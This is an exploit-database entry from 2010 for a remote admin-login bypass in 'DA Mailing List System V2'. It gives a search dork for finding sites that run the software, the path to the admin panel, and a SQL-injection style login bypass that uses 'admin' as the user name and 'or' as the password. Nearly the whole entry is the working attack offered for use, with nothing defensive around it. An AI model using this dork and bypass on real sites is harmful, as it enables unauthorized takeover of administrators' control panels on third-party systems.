id: 10784
date: 02/07/2010
title: DA Mailing List System V2 Remote Admin Login Vulnerability
author: Phenom
cves: 

==========================================================
DA Mailing List System V2 Remote Admin Login Vulnerability
==========================================================

#  Dork: DA Mailing List System V2 Powered by DigitalArakan.Net       #              
#                                                                     #
#  Version : 2                                                        #
#                                                                     #
#######################################################################
#                                                                     #
# Exploit :                                                           #
#                                                                     #
# 1- http://server/path/admin_cp.asp                                  #
#                                                                     #
# 2- login with "admin" as user name and 'or' as password             #                         
#                                                                     # 
#######################################################################



#  0day.today [2023-03-24]  #